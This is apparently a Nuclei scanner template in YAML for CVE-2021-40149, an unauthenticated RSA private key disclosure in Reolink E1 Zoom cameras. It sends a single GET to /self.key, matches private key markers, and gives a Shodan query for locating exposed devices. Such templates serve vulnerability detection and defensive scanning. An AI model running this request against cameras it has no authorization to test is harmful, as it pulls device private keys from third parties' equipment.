38 lines
1023 B
YAML
38 lines
1023 B
YAML
id: CVE-2021-40149
|
|
|
|
info:
|
|
name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
|
|
author: For3stCo1d
|
|
severity: high
|
|
description: |
|
|
Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
|
|
reference:
|
|
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
|
|
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
|
|
classification:
|
|
cve-id: CVE-2021-40149
|
|
metadata:
|
|
shodan-query: http.title:"Reolink"
|
|
verified: "true"
|
|
tags: cve,cve2021,reolink,camera,iot,exposure,unauth
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/self.key"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "-----BEGIN RSA PRIVATE KEY-----"
|
|
- "-----END RSA PRIVATE KEY----"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/06/30
|